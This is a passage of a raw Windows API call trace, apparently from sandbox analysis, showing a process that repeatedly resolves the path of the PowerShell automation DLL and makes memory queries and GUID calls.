AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.469] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.469] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x68298c61, Data2=0xe8a4, Data3=0x4121, Data4=([0]=0x9b, [1]=0x9f, [2]=0x5c, [3]=0x1a, [4]=0xc0, [5]=0x91, [6]=0x4f, [7]=0x7c))) returned 0x0 [0054.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.469] GetLastError () returned 0x0 [0054.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.469] GetLastError () returned 0x0 [0054.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.469] GetLastError () returned 0x0 [0054.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.469] GetLastError () returned 0x0 [0054.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.469] GetLastError () returned 0x0 [0054.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.469] GetLastError () returned 0x0 [0054.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.469] GetLastError () returned 0x0 [0054.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.469] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.470] GetLastError () returned 0x0 [0054.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.471] GetLastError () returned 0x0 [0054.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.471] GetLastError () returned 0x0 [0054.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.471] GetLastError () returned 0x0 [0054.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.471] GetLastError () returned 0x0 [0054.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.471] GetLastError () returned 0x0 [0054.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.471] GetLastError () returned 0x0 [0054.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.471] GetLastError () returned 0x0 [0054.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.471] GetLastError () returned 0x0 [0054.471] VirtualQuery (in: lpAddress=0x2cd294, lpBuffer=0x2ce294, dwLength=0x1c | out: lpBuffer=0x2ce294*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.471] VirtualQuery (in: lpAddress=0x2cd2d0, lpBuffer=0x2ce2d0, dwLength=0x1c | out: lpBuffer=0x2ce2d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce084, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.472] GetLastError () returned 0x0 [0054.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.472] GetLastError () returned 0x0 [0054.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.472] GetLastError () returned 0x0 [0054.472] VirtualQuery (in: lpAddress=0x2cd39c, lpBuffer=0x2ce39c, dwLength=0x1c | out: lpBuffer=0x2ce39c*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce084, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.472] GetLastError () returned 0x0 [0054.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.472] GetLastError () returned 0x0 [0054.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.473] GetLastError () returned 0x0 [0054.473] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x22cd9ec0, Data2=0x80df, Data3=0x4e4d, Data4=([0]=0xbf, [1]=0xad, [2]=0x26, [3]=0x65, [4]=0x74, [5]=0x86, [6]=0x8a, [7]=0x63))) returned 0x0 [0054.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.473] GetLastError () returned 0x0 [0054.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.473] GetLastError () returned 0x0 [0054.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.473] GetLastError () returned 0x0 [0054.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.473] GetLastError () returned 0x0 [0054.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.473] GetLastError () returned 0x0 [0054.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.473] GetLastError () returned 0x0 [0054.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.473] GetLastError () returned 0x0 [0054.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.473] GetLastError () returned 0x0 [0054.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.473] GetLastError () returned 0x0 [0054.474] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xcc61e041, Data2=0x462, Data3=0x4f98, Data4=([0]=0xa4, [1]=0x3e, [2]=0x12, [3]=0x17, [4]=0x92, [5]=0xb, [6]=0xbb, [7]=0x30))) returned 0x0 [0054.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.474] GetLastError () returned 0x0 [0054.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.474] GetLastError () returned 0x0 [0054.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.474] GetLastError () returned 0x0 [0054.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.474] GetLastError () returned 0x0 [0054.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.474] GetLastError () returned 0x0 [0054.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.474] GetLastError () returned 0x0 [0054.474] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x2384d995, Data2=0xe12d, Data3=0x4f65, Data4=([0]=0x8c, [1]=0x90, [2]=0xb1, [3]=0x73, [4]=0x81, [5]=0xbe, [6]=0x16, [7]=0x7b))) returned 0x0 [0054.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.475] GetLastError () returned 0x0 [0054.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.475] GetLastError () returned 0x0 [0054.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.475] GetLastError () returned 0x0 [0054.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.475] GetLastError () returned 0x0 [0054.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.475] GetLastError () returned 0x0 [0054.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.475] GetLastError () returned 0x0 [0054.475] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x87ab3973, Data2=0x8573, Data3=0x435f, Data4=([0]=0x9b, [1]=0xc, [2]=0xe1, [3]=0xba, [4]=0xf9, [5]=0xb1, [6]=0x80, [7]=0x74))) returned 0x0 [0054.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.475] GetLastError () returned 0x0 [0054.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.475] GetLastError () returned 0x0 [0054.475] GetFullPathNameW (in: 